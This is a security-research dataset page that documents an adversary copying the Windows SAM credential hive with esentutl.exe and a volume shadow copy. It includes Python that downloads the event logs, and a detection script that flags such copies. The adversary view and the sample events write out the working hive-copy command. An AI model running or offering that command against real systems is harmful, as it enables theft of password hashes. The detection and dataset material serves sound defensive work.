SAM Copy via Esentutl VSS
Metadata

| Field | Value |
|---|---|
| Contributors | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date | 2020/10/19 |
| Modification Date | 2020/10/19 |
| Tactics | |
| Techniques | |
| Tags | art.a90c2f4d-6726-444e-99d2-a00cd7c20480 |
Dataset Description

This dataset represents adversaries copying the SAM hive using the esentutl.exe utility and the Volume Shadow Copy Service (VSS).
Datasets Downloads

| Type | Link |
|---|---|
| Host | |
Adversary View

```
Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\wardog>esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\ProgramData\SAM

Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 10.0
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initializing VSS subsystem...
Initiating COPY FILE mode...
     Source File: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32
Destination File: C:\ProgramData\SAM

          Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

     Total bytes read = 0x9000 (36864) (0 MB)
  Total bytes written = 0x9000 (36864) (0 MB)

Operation completed successfully in 4.859 seconds.

C:\Users\wardog>
```
Explore Datasets

Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# Dataset archive hosted in the OTRF Security-Datasets repository
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_sam_copy_esentutl.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # fail early on a bad download instead of trying to unzip an error page
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])  # path of the extracted JSON-lines file
```
Read JSON File

```python
import pandas as pd

# Each line of the extracted file is one JSON event
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
```
Access Security Events

```python
# Count events per log channel (Sysmon, Security, ...) to see what the dataset contains
df.groupby(['Channel']).size().sort_values(ascending=False)
```
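As an added example (not part of the original dataset page or the OTRF notebooks), the following Python scans JSON-lines process-creation events for the behaviour shown in the adversary view: esentutl.exe run in copy-file mode (/y) with the /vss switch against a registry hive under the config directory. It goes slightly beyond the page by also matching the SYSTEM and SECURITY hives, since the same technique copies them, and it handles the forward-slash path from the adversary view as well as backslash paths and mixed case. The sample events are constructed for this example, and the field names (Channel, EventID, Image, CommandLine) are assumed to match the Security Datasets schema.

```python
import json
import ntpath
import re

# Constructed Sysmon (EventID 1) and Security (EventID 4688) process-creation
# records in the JSON-lines shape of the dataset files. Field names are assumed
# to match the Security Datasets schema; the rows themselves are made up here.
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in [
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r"esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\ProgramData\SAM"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r"esentutl.exe /p C:\Windows\WID\Data\SUSDB.mdf"},  # benign ESE database repair
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Windows\System32\config"},
    {"Channel": "Security", "EventID": 4688,
     "Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r"ESENTUTL.EXE /Y /VSS C:\WINDOWS\SYSTEM32\CONFIG\SYSTEM /D C:\TEMP\SYSTEM"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 11,  # file-create, not process-create
     "Image": r"C:\Windows\System32\esentutl.exe",
     "TargetFilename": r"C:\ProgramData\SAM"},
])

# Process-creation event IDs: Sysmon 1 and Windows Security 4688
PROCESS_CREATE_IDS = {1, 4688}

# A credential hive under ...\config\ (or .../config/), followed by whitespace or end of line.
# The character class accepts both path separators; IGNORECASE covers mixed-case command lines.
HIVE_RE = re.compile(r"[\\/]config[\\/](sam|system|security)(?=\s|$)", re.IGNORECASE)


def is_esentutl_vss_hive_copy(image, cmdline):
    """True when the process is esentutl.exe copying a registry hive out of a shadow copy."""
    if not image or not cmdline:
        return False
    # ntpath handles Windows paths correctly even when this runs on Linux/macOS
    if ntpath.basename(image).lower() != "esentutl.exe":
        return False
    # Compare whole switches rather than substrings so "/y" cannot match inside a path
    switches = {tok.lower() for tok in cmdline.split()}
    return "/y" in switches and "/vss" in switches and HIVE_RE.search(cmdline) is not None


def scan_jsonl(text):
    """Return the process-creation events in a JSON-lines string that match the detection."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue  # tolerate blank lines in the file
        event = json.loads(line)
        if event.get("EventID") not in PROCESS_CREATE_IDS:
            continue  # file-create and other events carry no command line to inspect
        if is_esentutl_vss_hive_copy(event.get("Image"), event.get("CommandLine")):
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in scan_jsonl(SAMPLE_JSONL):
        print(hit["Channel"], hit["EventID"], hit["CommandLine"])
```

To run the same check over the dataset downloaded above, pass the contents of the extracted file: `scan_jsonl(open(datasetJSONPath, encoding="utf-8").read())`. Matching on whole switches plus the hive path keeps ordinary esentutl.exe use (ESE database repair or defragmentation) out of the results, while still catching the SAM copy shown in the adversary view regardless of slash style or letter case.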